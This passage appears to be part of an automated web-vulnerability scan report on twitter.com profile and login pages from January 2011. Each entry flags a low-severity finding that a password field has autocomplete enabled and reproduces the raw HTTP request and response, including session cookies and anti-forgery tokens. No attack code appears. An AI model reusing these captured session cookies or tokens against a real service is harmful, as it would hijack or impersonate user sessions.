Last-Modified: Sat, 29 Jan 2011 01:41:29 GMT
X-Runtime: 0.00715
Content-Type: text/html; charset=utf-8
Content-Length: 19131
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.107. http://twitter.com/lapubell

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /lapubell

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /lapubell HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225026-90981-8371
ETag: "aa94e1eda1d46648c91aba85f6351309"
Last-Modified: Fri, 28 Jan 2011 14:30:26 GMT
X-Runtime: 0.00798
Content-Type: text/html; charset=utf-8
Content-Length: 38074
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="ec70386b7d5d456ffca2266b6a8540940bd13a48" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.108. http://twitter.com/login

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /login

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /login HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224736-89084-19137
ETag: "849e44ccdc2da8651621c818bd6cc65c"
Last-Modified: Fri, 28 Jan 2011 14:25:36 GMT
X-Runtime: 0.03302
Content-Type: text/html; charset=utf-8
Content-Length: 12714
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYzhmZTI4YjQwNmVmYjgxZGY5YWI0MGFkNWYyNjIx%250AOWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--54109c50eed6759247aa1ca10510e42039e66977; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div class="wrapper">

<form action="https://twitter.com/sessions" class="signin" method="post"><div style="margin:0;padding:0">
...[SNIP]...
<td><input id="password" name="session[password]" type="password" value="" /> <small>
...[SNIP]...

12.109. http://twitter.com/malsup

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /malsup HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://malsup.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129452629042599503; k=173.193.214.243.1295994766153789

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:04:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296223456-14164-3404
ETag: "369af92da7b575f3f9e1aeeb54e34e15"-gzip
Last-Modified: Fri, 28 Jan 2011 14:04:16 GMT
X-Runtime: 0.01613
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 49593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="c16509cab86c20df6d9319fd10b0d7b68fb3b9c7" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.110. http://twitter.com/malsup/favorites

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/favorites

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /malsup/favorites HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:31 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224911-48509-36720
ETag: "aa813f25e26e58a8fc00a80271530b6f"
Last-Modified: Fri, 28 Jan 2011 14:28:31 GMT
X-Runtime: 0.28607
Content-Type: text/html; charset=utf-8
Content-Length: 57347
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlOWM3MDM0NDIyYzY2M2ZkMzM0YWE1NDgwMzg1NWRh%250AM2U6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--316ed1acac7dec68e9460d11f94a8de8f6191911; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="92323813aaba9778b209aff24a7db8fa9d1a21b4" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.111. http://twitter.com/malsup/lists/memberships

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/lists/memberships

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /malsup/lists/memberships HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224909-80319-15886
ETag: "c8e3bcf74656418e1966d131ca1712ec"
Last-Modified: Fri, 28 Jan 2011 14:28:29 GMT
X-Runtime: 0.29750
Content-Type: text/html; charset=utf-8
Content-Length: 53194
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlOTY3NDUzZWYzNmZkNjRmZmZhNWVmMDJlMjczNTIz%250AYWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d2b7d333c4ae3616cea1972ad8fcfbf90f4504; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="a38f8495714acb2295d777e7c73336f7b8a83544" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.112. http://twitter.com/mariamenounos

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /mariamenounos

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /mariamenounos HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266001-12668-52676
ETag: "dfd5f78ed0c4ed8b98562bddfee9b7e2"
Last-Modified: Sat, 29 Jan 2011 01:53:21 GMT
X-Runtime: 0.01149
Content-Type: text/html; charset=utf-8
Content-Length: 49303
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="3723e202a9c4713d2e0ab10a755e86c7ea9d72e2" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.113. http://twitter.com/mattbanks

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /mattbanks

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /mattbanks HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225020-89730-48319
ETag: "ec0575d0afb2bf3f6fc09ae312d729c0"
Last-Modified: Fri, 28 Jan 2011 14:30:20 GMT
X-Runtime: 0.01604
Content-Type: text/html; charset=utf-8
Content-Length: 50027
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="e8f9370f93317ba4b15e1f342f9316dc573a1453" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.114. http://twitter.com/mennovanslooten

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /mennovanslooten

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /mennovanslooten HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:10 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225070-8349-1627
ETag: "d5a74d3b21022a46e5228042d143d163"
Last-Modified: Fri, 28 Jan 2011 14:31:10 GMT
X-Runtime: 0.01281
Content-Type: text/html; charset=utf-8
Content-Length: 48347
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="95a53231f6bdbb43ee75edda88e3683c2f9ebfba" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.115. http://twitter.com/messengerpost

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /messengerpost

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /messengerpost HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225043-32375-15875
ETag: "e9683276160c0ad3462c344153ccbcdb"
Last-Modified: Fri, 28 Jan 2011 14:30:43 GMT
X-Runtime: 0.01196
Content-Type: text/html; charset=utf-8
Content-Length: 50655
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="cf070f8d8e93143271599eb22cc58bdd038bdab0" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.116. http://twitter.com/miketaylr

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /miketaylr

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /miketaylr HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225015-365-19064
ETag: "fe6b40f83a3db7f038fdf6a1c2da2712"
Last-Modified: Fri, 28 Jan 2011 14:30:15 GMT
X-Runtime: 0.01247
Content-Type: text/html; charset=utf-8
Content-Length: 50661
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

